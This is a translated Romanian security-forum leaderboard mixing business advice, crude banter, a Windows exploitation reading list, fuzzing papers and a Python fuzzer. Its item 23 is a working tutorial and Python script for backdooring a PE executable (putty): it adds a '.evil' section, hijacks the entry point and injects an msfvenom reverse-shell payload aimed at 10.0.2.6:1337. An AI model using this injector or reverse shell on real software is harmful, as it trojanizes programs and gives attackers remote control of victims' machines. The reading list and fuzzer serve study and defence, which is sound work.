Leaderboard


Popular Content

Showing content with the highest reputation since 06/21/18 in all areas

  1. 10 points
    Ok, I rarely see people around here accept criticism and treat it as something constructive, so well done, good start. I didn't want to waste my time at first, but now maybe something will stick. Advice (take it with a grain of salt, I'm not an expert in the field, but I've been through some similar processes):

    1. Remove the hyperlink to your site from this thread, it doesn't put you in a positive light. Someone who wants to see who they're dealing with before paying a cent and googles you will see that you are in the same situation as the people you want to help, but you can't help yourself. Blind leading the blind, if you catch my drift. That is, say you're a small company and you want to "maximize your revenue through technical solutions" as you say above, including "online marketing" and a "development plan" as you say on the site; right now you lack exactly those things, and you were thinking of spamming people for lack of other ideas. If another small company pays you to promote them, what do you do? Start spamming others on their behalf? Anyway, leaving aside the irony of your situation, back to something a bit more constructive:

    2. From the first seconds someone comes into contact with you/your site (we can't talk about a "brand" yet) you need to highlight what makes you different (in a good way) from the other umpteen thousand nobodies who call themselves experts, why it's worth their time to listen to you in the first place (time is money) and then why they should give you money. In other words, what is your USP (Unique Selling Point)? Then the client should quickly understand how you can use that USP to help them. The site is very generic and "cold"; it isn't clear exactly and concretely what you offer, how, and how specifically you help potential clients.

    3. Know your competition, do your homework. Look at who you'd be competing with in your niche. See what they do well (in terms of the site and how they promote themselves) and try to adapt (not copy) it to your context. See what they're missing (put yourself in the shoes of a potential client) and what you don't like, what would convince you to become their client, etc., and act accordingly in your own business. Also run a small test with friends, relatives, family, etc.: ask them to imagine they're small entrepreneurs, give them the context of your ideal client and then have them give you an honest take on whether they'd use your services or someone else's, what would convince them to come to you, etc.

    4. Know your operating environment, namely Romania, the culture you operate in: in these circumstances things still run a lot on recommendations, on word of mouth from your first clients. In other countries people look at rating sites, or back in the day Yelp/Yellow Pages, etc. At the start you need to build a strong base of support, financially but also in terms of testimonials. Besides the relationship you have to develop, on the site you have to explain concretely what you did, so that even the dumbest reader gets it. Putting up a few "David, Constanța", "Mariana, Pitesti", "Carmen, Ilfov" is worth fuck all, it has zero credibility; anyone can write sentences like that and add unlimited names and locations. If you look at professional sites, they have "case studies". These have to be kept succinct and follow the STAR method (Situation, Task, Action, Result). That is, what problems the client had that made them come to you (this way potential clients identify/relate more easily and see themselves in the shoes of those who came to you). Then what they gave you to do (subconsciously this shows them they can trust you with x, y, z). How you acted (here you have a promotion opportunity to show how creative you are, etc.) and then the result (this is the final "sales" point that convinces Joe from the village that they too can get the same result or better if they use your services). I've had companies in the past offer me considerable discounts in exchange for such case studies or testimonials. These can be something graphic and succinct in a PDF or a very short clip, or combined, etc., depending on need.

    5. Get up to speed on all the efficient methods (in terms of time, cost, etc., including their weaknesses) of delivering what you want to deliver. I don't want to repeat point 1 above, but you have to know your trade if you want to survive. It's a continuous process, you'll never know enough, but every client has to see that you know your field. Clueless people only survive off fools who don't know better. Don't get me wrong, you can make a lot of money off fools too (e.g. https://www.fiverr.com/gabonne) but I suspect you don't want to focus on that "niche". You say you offer IT Support, Online Marketing, Brand Identity, Application Development, Development Plan; from my point of view you get there in time, when you have at least 50 employees. If someone comes to you, say, and wants the whole range for a small double-glazing company, what do you do, waste their time and money or turn them down because you have no idea? For example, if besides an intranet for the company they want daily backup solutions, a bespoke CRM application, payments, suppliers, etc. + an online development plan, etc. You have to have the capability to deliver what you say you deliver. And these days, for people to keep you as a supplier, they also expect advice (mini-consulting) in the field that comes with the product, to see that you care about them. For example you tell them: look, we can do it your way (a full daily backup, say), but you can also do it incrementally (faster, more cost-efficient, etc.). In fields like these you also become a kind of consultant, and if you have no idea what you're talking about you just waste their time and money and then you get the boot. Focus on something you know very well and then you can grow organically.

    You can set up collaborations with others who are good in other fields; the better you collaborate, the better you come out. That's about it for now regarding the site and you... when/if I feel like it I'll write something about promotion ideas too.
  2. 4 points
    Steal another one without a password... it's simpler. Edit// sorry, "buy" another one.
  3. 4 points
    I blame @aelius, my mentor.
  4. 4 points
    I'd rather do dropshipping with vibrators. With all the small-dicked drunks in Romania, I'd surely sell well to the poor women :)))))))
  5. 4 points
    :))))))))))))))) DESCRIPTION OF THE BUSINESS: The business is functional. It has a customer database. The business can grow if promoted online through Google or Facebook. The price is negotiable. The company is not for sale, only the site. It has SEO integrated. DETAILS ABOUT THE DESIRED TRANSACTION: Only the site, the Facebook page and the database are for sale. The company is not for sale. The price is not negotiable. 30 days of assistance are offered. The customers aren't on a "subscription" paying you for some service. They buy now and maybe buy something again in 2 years. So basically they're selling a crappy Magento, a few suckers put in a database and that's about it. So in 5 years they made a profit of 9000 and they want 15,000 for the site. That's a good one.
  7. 4 points
    Something like this? (maybe I missed a quote or something, it's late)

    #!/bin/bash
    # Poll per-service details from one site, then POST the last N lines of
    # each to a second site; repeat forever.
    curl="/usr/bin/curl"
    sleep="/bin/sleep"
    website="https://www.domain.nl"
    # Note: the API token travels in the query string, so it ends up in
    # web-server and proxy logs on both sides.
    token="8d1f1aac0dd8a76b49e8bbdda0c7c98c"
    wait="30"
    lines="50"
    services="apache nginx ftp ssh dmesg"
    update_site="https://www.domain.de"
    # Extra curl options kept as an array: passing the whole string through
    # -H "$update_argv" would send it to curl as one header value.
    update_argv=(-H 'Content-Type: application/x-www-form-urlencoded' -X POST)

    while true; do
        post_args=()
        for i in $services; do
            # The URL must be quoted: an unquoted '&' backgrounds curl and turns
            # 'func=...' and 'detail=...' into shell assignments.
            details=$("$curl" -s "$website/servers.php?api=$token&func=get_details&detail=$i" | tail -n "$lines")
            # --data-urlencode escapes '&', '=' and newlines inside the log
            # lines, which a hand-built "apache=$apache&nginx=..." body would not.
            post_args+=(--data-urlencode "$i=$details")
        done
        "$curl" -s "${post_args[@]}" "${update_argv[@]}" "$update_site/?api=$token&func=provision"
        "$sleep" "$wait"
    done
  8. 3 points
    I'll shove my dick into filelist and into your mommies. You've filled the forum with all this crap.
  9. 3 points
    https://itty.bitty.site
    Itty bitty sites are contained entirely within their own link. (Including this one!) This means they're...
    💼 Portable - you don't need a server to host them
    👁 Private - nothing is sent to, or stored on, this server
    🎁 Easy to share as a link or QR code
    Itty bitty sites can hold about as much as a printed page, and there is a lot you can do with that:
    ✒️ Compose poetry
    🛠 Create an app
    🐦 Bypass a 140 (now 280) char limit
    🎨 Express yourself in ascii
  10. 3 points
    You're upset that she's better endowed than you :))))))))
  11. 3 points
    You think you'll manage to sell your firecracker of a site here. I suspect it's yours, first post and you landed straight here :)))))
  12. 3 points
    Windows stack overflows (stack-based overflow articles)
    - Win32 Buffer Overflows (Location, Exploitation and Prevention) – by Dark spyrit [1999]
    - Writing Stack Based Overflows on Windows – by Nish Bhalla [2005]

    Windows heap overflows (heap-based overflow articles)
    - Third Generation Exploitation smashing heap on 2k – by Halvar Flake [2002]
    - Exploiting the MSRPC Heap Overflow Part 1 – by Dave Aitel (MS03-026) [September 2003]
    - Exploiting the MSRPC Heap Overflow Part 2 – by Dave Aitel (MS03-026) [September 2003]
    - Windows heap overflow penetration in black hat – by David Litchfield [2004]

    Kernel based Windows overflows (kernel exploit development articles)
    - How to attack kernel based vulns on windows was done – by a Polish group called "sec-labs" [2003]
    - Sec-lab old whitepaper
    - Sec-lab old exploit
    - Windows Local Kernel Exploitation (based on sec-lab research) – by S.K Chong [2004]
    - How to exploit Windows kernel memory pool – by SoBeIt [2005]
    - Exploiting remote kernel overflows in windows – by Eeye Security
    - Kernel-mode Payloads on Windows in uninformed – by Matt Miller
    - Exploiting 802.11 Wireless Driver Vulnerabilities on Windows
    - BH US 2007 Attacking the Windows Kernel
    - Remote and Local Exploitation of Network Drivers
    - Exploiting Common Flaws In Drivers
    - I2OMGMT Driver Impersonation Attack
    - Real World Kernel Pool Exploitation
    - Exploit for windows 2k3 and 2k8
    - Analyzing local privilege escalations in win32k
    - Intro to Windows Kernel Security Development
    - There's a party at ring0 and you're invited
    - Windows kernel vulnerability exploitation

    Windows memory protections (introduction articles)
    - Data Execution Prevention
    - /GS (Buffer Security Check)
    - /SAFESEH
    - ASLR
    - SEHOP

    Bypassing filter and protections (Windows memory protection bypass articles)
    - Third Generation Exploitation smashing heap on 2k – by Halvar Flake [2002]
    - Creating Arbitrary Shellcode In Unicode Expanded Strings – by Chris Anley
    - Advanced windows exploitation – by Dave Aitel [2003]
    - Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server – by David Litchfield
    - Reliable heap exploits and after that Windows Heap Exploitation (Win2KSP0 through WinXPSP2) – by Matt Conover at CanSecWest 2004
    - Safely Searching Process Virtual Address Space – by Matt Miller [2004]
    - IE exploit that used a technique called Heap Spray
    - Bypassing hardware-enforced DEP – by Skape (Matt Miller) and Skywing (Ken Johnson) [October 2005]
    - Exploiting Freelist[0] On XP Service Pack 2 – by Brett Moore [2005]
    - Kernel-mode Payloads on Windows in uninformed
    - Exploiting 802.11 Wireless Driver Vulnerabilities on Windows
    - Exploiting Common Flaws In Drivers
    - Heap Feng Shui in JavaScript – by Alexander Sotirov [2007]
    - Understanding and bypassing Windows Heap Protection – by Nicolas Waisman [2007]
    - Heaps About Heaps – by Brett Moore [2008]
    - Bypassing browser memory protections in Windows Vista – by Mark Dowd and Alex Sotirov [2008]
    - Attacking the Vista Heap – by Ben Hawkes [2008]
    - Return oriented programming: Exploitation without Code Injection – by Hovav Shacham (and others) [2008]
    - Token Kidnapping and a super reliable exploit for windows 2k3 and 2k8 – by Cesar Cerrudo [2008]
    - Defeating DEP Immunity Way – by Pablo Sole [2008]
    - Practical Windows XP/2003 Heap Exploitation – by John McDonald and Chris Valasek [2009]
    - Bypassing SEHOP – by Stefan Le Berre, Damien Cauquil [2009]
    - Interpreter Exploitation: Pointer Inference and JIT Spraying – by Dionysus Blazakis [2010]
    - Write-up of Pwn2Own 2010 – by Peter Vreugdenhil
    - All in one 0day presented in rootedCON – by Ruben Santamarta [2010]
    - DEP/ASLR bypass using 3rd party – by Shahin Ramezany [2013]

    Typical windows exploits
    - Real-world HW-DEP bypass Exploit – by Devcode
    - Bypassing DEP by returning into HeapCreate – by Toto
    - First public ASLR bypass exploit by using partial overwrite – by Skape
    - Heap spray and bypassing DEP – by Skylined
    - First public exploit that used ROP for bypassing DEP in adobe lib TIFF vulnerability
    - Exploit codes of bypassing browsers memory protections
    - PoC's on Token Kidnapping: PoC for 2k3 – part 1 – by Cesar Cerrudo
    - PoC's on Token Kidnapping: PoC for 2k8 – part 2 – by Cesar Cerrudo
    - An exploit that works from win 3.1 to win 7 – by Tavis Ormandy (KiTra0d)
    - Old ms08-067 metasploit module multi-target and DEP bypass
    - PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass
    - SMBv2 Exploit – by Stephen Fewer

    Exploit development tutorial series (exploit development tutorial series based on the Windows operating system)
    Corelan Team
    - Exploit writing tutorial part 1 : Stack Based Overflows
    - Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode
    - Exploit writing tutorial part 3 : SEH Based Exploits
    - Exploit writing tutorial part 3b : SEH Based Exploits – just another example
    - Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics
    - Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit development
    - Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR
    - Exploit writing tutorial part 7 : Unicode – from 0x00410041 to calc
    - Exploit writing tutorial part 8 : Win32 Egg Hunting
    - Exploit writing tutorial part 9 : Introduction to Win32 shellcoding
    - Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik's Cube
    - Exploit writing tutorial part 11 : Heap Spraying Demystified
    Fuzzysecurity
    - Part 1: Introduction to Exploit Development
    - Part 2: Saved Return Pointer Overflows
    - Part 3: Structured Exception Handler (SEH)
    - Part 4: Egg Hunters
    - Part 5: Unicode 0x00410041
    - Part 6: Writing W32 shellcode
    - Part 7: Return Oriented Programming
    - Part 8: Spraying the Heap [Chapter 1: Vanilla EIP]
    - Part 9: Spraying the Heap [Chapter 2: Use-After-Free]
    Securitysift
    - Windows Exploit Development – Part 1: The Basics
    - Windows Exploit Development – Part 2: Intro to Stack Based Overflows
    - Windows Exploit Development – Part 3: Changing Offsets and Rebased Modules
    - Windows Exploit Development – Part 4: Locating Shellcode With Jumps
    - Windows Exploit Development – Part 5: Locating Shellcode With Egghunting
    - Windows Exploit Development – Part 6: SEH Exploits
    - Windows Exploit Development – Part 7: Unicode Buffer Overflows

    Tools (disassemblers, debuggers, and other static and dynamic analysis tools)
    - angr – Platform-agnostic binary analysis framework developed at UCSB's Seclab.
    - BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework.
    - binnavi – Binary analysis IDE for reverse engineering based on graph visualization.
    - Bokken – GUI for Pyew and Radare.
    - Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages.
    - codebro – Web based code browser using clang to provide basic code analysis.
    - dnSpy – .NET assembly editor, decompiler and debugger.
    - Evan's Debugger (EDB) – A modular debugger with a Qt GUI.
    - GDB – The GNU debugger.
    - GEF – GDB Enhanced Features, for exploiters and reverse engineers.
    - hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols.
    - IDA Pro – Windows disassembler and debugger, with a free evaluation version.
    - Immunity Debugger – Debugger for malware analysis and more, with a Python API.
    - ltrace – Dynamic analysis for Linux executables.
    - objdump – Part of GNU binutils, for static analysis of Linux binaries.
    - OllyDbg – An assembly-level debugger for Windows executables.
    - PANDA – Platform for Architecture-Neutral Dynamic Analysis
    - PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands.
    - pestudio – Perform static analysis of Windows executables.
    - Process Monitor – Advanced monitoring tool for Windows programs.
    - Pyew – Python tool for malware analysis.
    - Radare2 – Reverse engineering framework, with debugger support.
    - SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analysis.
    - strace – Dynamic analysis for Linux executables.
    - Udis86 – Disassembler library and tool for x86 and x86_64.
    - Vivisect – Python tool for malware analysis.
    - X64dbg – An open-source x64/x32 debugger for Windows

    Source: https://n0where.net/awesome-windows-exploitation-resources
  13. 3 points
    Fuzzing is an effective and widely used technique for finding security bugs and vulnerabilities in software. It inputs irregular test data into a target program to try to trigger a vulnerable condition in the program execution. Since the first random fuzzing system was constructed, fuzzing efficiency has been greatly improved by combination with several useful techniques, including dynamic symbolic execution, coverage guide, grammar representation, scheduling algorithms, dynamic taint analysis, static analysis and machine learning. In this paper, we will systematically review these techniques and their corresponding representative fuzzing systems. By introducing the principles, advantages and disadvantages of these techniques, we hope to provide researchers with a systematic and deeper understanding of fuzzing techniques and provide some references for this field. Download:
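    A coverage-guided mutational fuzzer in miniature, added here as an example (it is not code from the paper or from the post): it applies the abstract's "coverage guide" idea, keeping an input only when it reaches a control-flow edge no earlier input reached, to a constructed toy parser, parse_record, that trusts a field count it reads from the input. The target, the seed input, the mutation set and the function names are all assumptions made for this example; coverage is collected with sys.settrace, which stands in for the compile-time instrumentation a real fuzzer would use.

```python
import random
import sys
from collections import namedtuple

MAX_LEN = 64
INTERESTING = (0, 1, 2, 3, 4, 0x7F, 0x80, 0xFF)   # boundary values worth trying


def parse_record(data):
    """Constructed toy target. Kind 2 trusts the field count in data[4] and walks
    past the end of the buffer; the resulting IndexError plays the role that a
    memory-safety crash would play in a native parser."""
    if len(data) < 4 or data[:3] != b'REC':
        raise ValueError('bad magic')
    kind = data[3]
    if kind == 1:
        return {'kind': 'text', 'body': data[4:].decode('ascii', 'replace')}
    if kind == 2:
        if len(data) < 6:
            raise ValueError('short list record')
        count, pos, fields = data[4], 5, []
        for _ in range(count):
            length = data[pos]                  # bug: no bounds check on pos
            fields.append(data[pos + 1:pos + 1 + length])
            pos += 1 + length
        return {'kind': 'list', 'fields': fields}
    raise ValueError('unknown kind')


def run_with_coverage(target, data):
    """Run target(data); return (edges, crash). Edges are (prev_line, line) pairs
    seen inside target. ValueError is the parser rejecting input, which is
    expected; any other exception is reported as a crash."""
    edges, prev, code = set(), [0], target.__code__

    def tracer(frame, event, arg):
        if frame.f_code is not code:
            return None                         # do not trace other functions
        if event == 'line':
            edges.add((prev[0], frame.f_lineno))
            prev[0] = frame.f_lineno
        return tracer

    sys.settrace(tracer)
    try:
        target(data)
        crash = None
    except ValueError:
        crash = None
    except Exception as exc:
        crash = exc
    finally:
        sys.settrace(None)
    return frozenset(edges), crash


def mutate(rng, data):
    """One to three byte-level mutations (bit flip, interesting value, insert,
    delete): the primitives a mutational fuzzer such as AFL starts from."""
    d = bytearray(data)
    for _ in range(rng.randint(1, 3)):
        op = rng.randrange(4)
        if op == 0 and d:
            d[rng.randrange(len(d))] ^= 1 << rng.randrange(8)
        elif op == 1 and d:
            d[rng.randrange(len(d))] = rng.choice(INTERESTING)
        elif op == 2 and len(d) < MAX_LEN:
            d.insert(rng.randrange(len(d) + 1), rng.randrange(256))
        elif op == 3 and len(d) > 1:
            del d[rng.randrange(len(d))]
    return bytes(d)


FuzzResult = namedtuple('FuzzResult', 'crashing_input error execs corpus_size')


def fuzz(target, seeds, max_execs=50000, rng_seed=1):
    """Coverage-guided loop: a child joins the corpus only if it reaches an edge
    no earlier input reached; the first non-ValueError exception ends the run."""
    rng = random.Random(rng_seed)               # fixed seed keeps runs reproducible
    corpus, seen, execs = [], set(), 0
    for s in seeds:
        edges, crash = run_with_coverage(target, s)
        execs += 1
        if crash is not None:
            return FuzzResult(s, crash, execs, len(corpus))
        seen |= edges
        corpus.append(s)
    while execs < max_execs:
        child = mutate(rng, rng.choice(corpus))
        edges, crash = run_with_coverage(target, child)
        execs += 1
        if crash is not None:
            return FuzzResult(child, crash, execs, len(corpus))
        if edges - seen:                        # new coverage: keep for further mutation
            seen |= edges
            corpus.append(child)
    return FuzzResult(None, None, execs, len(corpus))


if __name__ == '__main__':
    print(fuzz(parse_record, [b'REC\x01hi']))
```

    The seed only exercises the kind 1 path; the fuzzer has to discover kind 2 by mutation, and because the "short list record" rejection adds a new edge, that intermediate input is retained and mutated further until the unchecked loop runs off the end of the buffer. Swapping the uniform corpus choice for a schedule that favours recent or rarely-hit entries, and the line tracer for edge counters in instrumented code, is what separates this sketch from the systems the paper surveys.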
  14. 3 points
    Hahyou'reslowgoeatourballs
  15. 3 points
    Most work on DOM Cross-Site Scripting (DOM-XSS) detection methods can be divided into three kinds: black-box fuzzing, static analysis, and dynamic analysis. However, black-box fuzzing and static analysis suffer much from high false negative rates and high false positive rates respectively. Current dynamic analysis is complex and expensive, though it can obtain more efficient results. In this paper, we propose a dynamic detection framework (TT-XSS) for DOM-XSS by means of taint tracking at the client side. We rewrite all JavaScript features and DOM APIs to taint the rendering process of browsers. To this end, new data types and methods are presented to extend the semantic description ability of the original data structure, based on which we can analyze the taint traces through tainting all sources, sinks and transfer processes during page parsing. In this way, attack vectors are derived to verify the vulnerabilities automatically. Compared to AWVS 10.0, our framework detects 1.8% more vulnerabilities, and it can generate the corresponding attack vectors to verify 9.1% of the vulnerabilities automatically. Download paper:
  16. 2 points
    What kind of men are you these days, she beats you and fucks you at the same time.
  17. 2 points
    Best to look at the balance sheet and the accounts, since you can't know what/how much was invested and where that "profit" came from.... Over 5 years with a turnover of 90,000 euro (i.e. under 2000 euro/month), it's hard to have an appetizing profit and employees, not to mention overheads. 9000 euro profit over 5 years = 150 euro/month
  18. 2 points
    Everyone should know about Phrack. The younger ones could take a look at POC || GTFO: https://www.alchemistowl.org/pocorgtfo/
  19. 2 points
    Hi, it's illegal. There are around 6 laws that clearly define the conditions under which you can contact someone with commercial offers. In principle, so you don't waste your time reading those laws:
    - Any unsolicited email of a commercial nature is SPAM.
    - To send a commercial email to an email address you must have the recipient's prior written consent (it must clearly say: I accept commercial communications from xyz)
    - You need a very well set up opt-in/opt-out system.
    Mind that the fines are steep. Best, if you're good at talking, pick up the phone and call the companies directly.
    Other advice:
    - Add clear information about the company to the site (address, phone, tax ID and whatever else you have there (other identification data))
    - Fill in "about us" with an interesting story. What's written there doesn't spark my interest at all. I expected to see a team, how you started, what vision you have....
    - The "what others say" section is lame. I mean... you're not going to be dumb enough to write on the site that a client said: "Bro, you're trash, go take up bricklaying, you bums".
    - Serve the site over https and redirect the http version to https. Stop giving out http links.
  20. 2 points
    Keep commenting nonsense and you'll get banned. Make an offer or close the tab.
  21. 2 points
    How is this different from the other umpteen thousand open-source ones? Written by some starving Indian with 4 followers on Twitter and a .tk domain. Popped up like a mushroom after rain, will disappear just the same after a while.
  22. 2 points
    Well, if we're not allowed to exploit bugs in random, what the hell can we do? If you consider random.choice to be random then there's no programming challenge at all. The payouts and strategies can be computed with the probability equations from 9th grade. But you'll notice it can be proven that there is no strategy that ends up winning. Forget the genetic neural nets, it's not that easy, snap: "quantum neurons" and you make money at roulette.
  23. 2 points
    Welcome to my next blog post. Today I want to show you some basic pentesting stuff. We will manually backdoor a PE file, in this case the putty client. I used the following software setup: Windows 10 Pro 32 Bit, Putty, Stud_PE, Immunity Debugger.

    Before we get our hands into assembly, I want to explain what we will do. We will add a section header named .evil to our file and hijack the file's execution flow. At the entry point we will redirect execution to our shellcode, and after gaining our shell the ordinary application runs (putty starts).

    #0x01 Adding Section
    At first we are going to add our new section .evil to our file through Stud_PE. The following pictures are pretty self-explanatory. I chose a section size of 1500 bytes, which are filled with null bytes. That's more than enough for our shellcode. After saving the file and loading it into Immunity you can see the differences between the two files (the new section .evil is spawned). And if you look at the address of .evil you will see the following (our predefined null bytes) -> Great! While checking our new section you may have noticed that the addresses have slightly changed. The last 4 bytes are always null bytes, but the first 4 bytes change on every reload of the file. 00FB0000 <-> 00250000. That's ASLR, a kernel protection; you can find more information about this countermeasure here. This makes some more work, but isn't a problem (more later).

    #0x02 Hijack Execution Flow
    Now we are looking at the entry point of our file in Immunity. The first instruction at 0x002B7FD6 is a call instruction. We are going to change the first instructions to jump into our code cave (.evil). Before changing any assembly instruction, copy the "old" instructions to a text file, because we are going to resume the application flow after executing our shellcode. Mark the first instruction and type "jmp [address of .evil]", in my case "jmp 0x002E3000". After hitting enter you will see the following: Save the changes to a new file and open it in Immunity. Now we take the first instruction with F7 and land in our code cave of null bytes at the .evil address. For our testing purposes we replace the null bytes with NOPs. To do so just mark all the null bytes of the code cave and do the following: We save the state of our registers on the top of the stack through the assembly instructions pushad && pushfd. At the end of our code cave we restore our register states with popfd and popad. So far no problems (hopefully).

    Now we do some math to counter the ASLR protection. We want to restore all overwritten functions at the end of our code cave and jump right back into the "old" execution flow. If you look at the entry point of our file, you will see that only the call instruction is missing. Without ASLR enabled we could use the saved address from our text file just like "call 0x002B8265", but you see that the address of the second instruction "jmp 0x002B7E6E" has also changed... ASLR, hurray! What now? We have to determine the offset between the old addresses to calculate the new overwritten call instruction. Instead of trying to explain the several locations, addresses and relations, I try to show it in the following pictures (if this isn't enough, please tell me via twitter and I will add text sections). In the end we got the "new" address for our overwritten call instruction, which is 0x13F8265. We place this call instruction right behind the restored registers (pushfd, pushad). Now we only need to jmp to the next ordinary instruction at the entry point via "jmp 0x01067FD8" and the execution will flow.

    #0x03 Inject Shellcode
    Choose your favourite shellcode or generate a new one. I used the following command: msfvenom -p windows/shell_reverse_tcp lhost=10.0.2.6 lport=1337 exitfunc=thread -f hex. Then use the binary paste function of Immunity to replace some of our NOPs with the shellcode. Save the file and voilà, you successfully backdoored a PE file! Ok, just one thing is missing. The shellcode from msfvenom uses the WaitForSingleObject function, and the default values prevent the application from executing until the shell is released. To solve this, change the "DEC ESI" code at the end of the shellcode to a nop.

    #0x04 PoC
    Start your listener and fire up the application. Thanks for reading, and if you like this post, check my twitter account please! xD
    Source: hansesecure.de
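    The ASLR detour in the post comes from working with the virtual addresses Immunity shows at run time. The same patch expressed in RVAs and rel32 displacements needs no offset math at all, because a 5-byte call/jmp rel32 is relative to the next instruction and does not care where the image is based. The script below is added here as an example; it is not the post's tooling and does not touch putty. It builds a constructed minimal PE32 whose entry point starts with "call rel32; jmp rel32", appends a .evil section, hijacks the entry exactly as the post describes (pushad/pushfd, shellcode, popfd/popad, replayed call, jump back to the next entry instruction), and then walks the patched control flow to check it. build_sample_pe, backdoor and trace are names chosen for this example, and the shellcode is a NOP placeholder.

```python
import struct

IMAGE_BASE, SECT_ALIGN, FILE_ALIGN = 0x00400000, 0x1000, 0x200


def _align(value, alignment):
    return (value + alignment - 1) // alignment * alignment


def build_sample_pe():
    """Constructed minimal PE32 (not a real binary): one .text section whose entry
    point begins with 'call rel32; jmp rel32', the shape the post met in putty."""
    entry_rva = 0x1000
    code = (b'\xE8\x0B\x00\x00\x00'       # 1000: call 1010
            + b'\xE9\x06\x00\x00\x00'     # 1005: jmp  1010
            + b'\x90' * 6                 # 100a: padding
            + b'\xC3')                    # 1010: ret
    text_raw = _align(len(code), FILE_ALIGN)
    dos = b'MZ' + b'\0' * 58 + struct.pack('<I', 0x40)            # e_lfanew = 0x40
    coff = struct.pack('<HHIIIHH', 0x14C, 1, 0, 0, 0, 224, 0x0102)  # i386, 1 section
    opt_fmt = '<HBB' + 'I' * 9 + 'H' * 6 + 'I' * 4 + 'HH' + 'I' * 6   # 96 bytes
    opt = struct.pack(opt_fmt, 0x10B, 14, 0, text_raw, 0, 0, entry_rva, entry_rva, 0,
                      IMAGE_BASE, SECT_ALIGN, FILE_ALIGN, 6, 0, 0, 0, 6, 0, 0,
                      _align(entry_rva + len(code), SECT_ALIGN), 0x200, 0, 3, 0x8140,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b'\0' * 128
    text_hdr = struct.pack('<8sIIIIIIHHI', b'.text', len(code), entry_rva, text_raw,
                           0x200, 0, 0, 0, 0, 0x60000020)        # CODE|EXECUTE|READ
    hdrs = dos + b'PE\0\0' + coff + opt + text_hdr
    return hdrs + b'\0' * (0x200 - len(hdrs)) + code + b'\0' * (text_raw - len(code))


def headers(pe):
    """The COFF/optional-header fields the patch needs."""
    e_lfanew, = struct.unpack_from('<I', pe, 0x3C)
    nsec, = struct.unpack_from('<H', pe, e_lfanew + 6)
    opt_size, = struct.unpack_from('<H', pe, e_lfanew + 20)
    opt = e_lfanew + 24
    entry_rva, = struct.unpack_from('<I', pe, opt + 16)
    sect_align, file_align = struct.unpack_from('<II', pe, opt + 32)
    size_of_image, size_of_headers = struct.unpack_from('<II', pe, opt + 56)
    return dict(e_lfanew=e_lfanew, opt=opt, nsec=nsec, table=opt + opt_size,
                entry_rva=entry_rva, sect_align=sect_align, file_align=file_align,
                size_of_image=size_of_image, size_of_headers=size_of_headers)


def rva_to_off(pe, rva):
    h = headers(pe)
    for i in range(h['nsec']):
        va, raw_size, raw_ptr = struct.unpack_from('<III', pe, h['table'] + 40 * i + 12)
        if va <= rva < va + raw_size:
            return raw_ptr + rva - va
    raise ValueError('RVA %#x is not backed by file data' % rva)


def rel32(opcode, from_rva, to_rva):
    """5-byte call/jmp rel32. The displacement is relative to the next instruction,
    so only RVAs matter; the base ASLR picks at load time is irrelevant."""
    return bytes([opcode]) + struct.pack('<i', to_rva - (from_rva + 5))


def backdoor(pe, shellcode, name=b'.evil', cave_size=1500):
    pe = bytearray(pe)
    h = headers(pe)
    new_hdr = h['table'] + 40 * h['nsec']
    if new_hdr + 40 > h['size_of_headers']:
        raise ValueError('no room in the header block for another section')
    entry_off = rva_to_off(pe, h['entry_rva'])
    if pe[entry_off] != 0xE8:
        raise ValueError('expected a 5-byte call at the entry point')
    disp, = struct.unpack_from('<i', pe, entry_off + 1)
    call_target = h['entry_rva'] + 5 + disp         # where the displaced call went
    # New section follows the last one in memory; on disk it goes after everything,
    # including any overlay (an Authenticode signature blob lives there).
    last_vsize, last_va, last_raw, last_ptr = struct.unpack_from('<IIII', pe, new_hdr - 40 + 8)
    cave_rva = _align(last_va + max(last_vsize, last_raw), h['sect_align'])
    cave_off = _align(max(last_ptr + last_raw, len(pe)), h['file_align'])
    cave_raw = _align(cave_size, h['file_align'])
    # Cave: pushad, pushfd, shellcode, popfd, popad, replayed call, jmp entry+5.
    # The shellcode is assumed to leave ESP as it found it.
    cave = b'\x60\x9C' + shellcode + b'\x9D\x61'
    cave += rel32(0xE8, cave_rva + len(cave), call_target)
    cave += rel32(0xE9, cave_rva + len(cave), h['entry_rva'] + 5)
    if len(cave) > cave_size:
        raise ValueError('shellcode does not fit in the cave')
    struct.pack_into('<8sIIIIIIHHI', pe, new_hdr, name, cave_size, cave_rva, cave_raw,
                     cave_off, 0, 0, 0, 0, 0xE0000020)   # CODE|EXECUTE|READ|WRITE
    struct.pack_into('<H', pe, h['e_lfanew'] + 6, h['nsec'] + 1)
    struct.pack_into('<I', pe, h['opt'] + 56, _align(cave_rva + cave_size, h['sect_align']))
    pe[entry_off:entry_off + 5] = rel32(0xE9, h['entry_rva'], cave_rva)   # hijack
    pe += b'\0' * (cave_off - len(pe)) + cave + b'\0' * (cave_raw - len(cave))
    return bytes(pe)


def trace(pe, shellcode_len):
    """Follow the patched flow for checking: entry -> cave -> replayed call -> resume."""
    h = headers(pe)
    entry_off = rva_to_off(pe, h['entry_rva'])
    cave_rva = h['entry_rva'] + 5 + struct.unpack_from('<i', pe, entry_off + 1)[0]
    call_rva = cave_rva + 4 + shellcode_len
    call_off = rva_to_off(pe, call_rva)
    call_target = call_rva + 5 + struct.unpack_from('<i', pe, call_off + 1)[0]
    resume = call_rva + 10 + struct.unpack_from('<i', pe, call_off + 6)[0]
    return dict(cave_rva=cave_rva, call_target=call_target, resume_rva=resume)


if __name__ == '__main__':
    patched = backdoor(build_sample_pe(), b'\x90' * 16)    # NOP placeholder shellcode
    print(trace(patched, 16))
```

    Two things worth noting from the defender's side: the patch leaves no relocation entries to fix up precisely because it is position independent, but it does leave a writable and executable section appended after the original ones and, if the input was Authenticode-signed, a file whose signature no longer verifies. Both are cheap checks to run over binaries you deploy.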
  24. 2 points
